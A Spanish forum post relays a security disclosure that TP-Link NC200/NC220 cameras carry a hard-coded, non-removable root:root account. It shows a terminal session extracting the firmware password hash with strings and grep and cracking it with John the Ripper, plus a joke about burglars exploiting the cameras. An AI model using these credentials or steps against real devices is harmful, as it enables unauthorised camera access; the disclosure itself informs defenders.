Foro Wifi-libre.com

Cuenta root:root sin posibilidad de desactivarla en las cámaras Wi-Fi TP-Link NC200/NC220 300Mbps

fuente del full disclosure :

• TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials de LiquidWorm @ Packetstorm

  LiquidWorm nos advierte sobre este gran falló en, por lo menos, dos modelos de cámaras vídeo estampillados TP-Link.
No hay mucho más por añadir tan la brecha es grosera: cualquier intruso o usuario sin derechos de administración puede hacerse con el control de una de estas cámaras. 
La cuenta de administrador "root:root" esta siempre activada
Así que si tienes pensado atracar una joyería : Busca una con cámaras TP-Link
Podéis ver aquí en vivo como jhon the ripper encuentra los credenciales :

root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root             (root)
guesses: 1  time: 0:00:00:00 DONE (Mon Aug  3 05:52:55 2015)  c/s: 400  trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left
root@zslab:~#

  Saludos desde aquí a Gjoko 'LiquidWorm' Krstic que podéis seguir en su web

• www.zeroscience.mk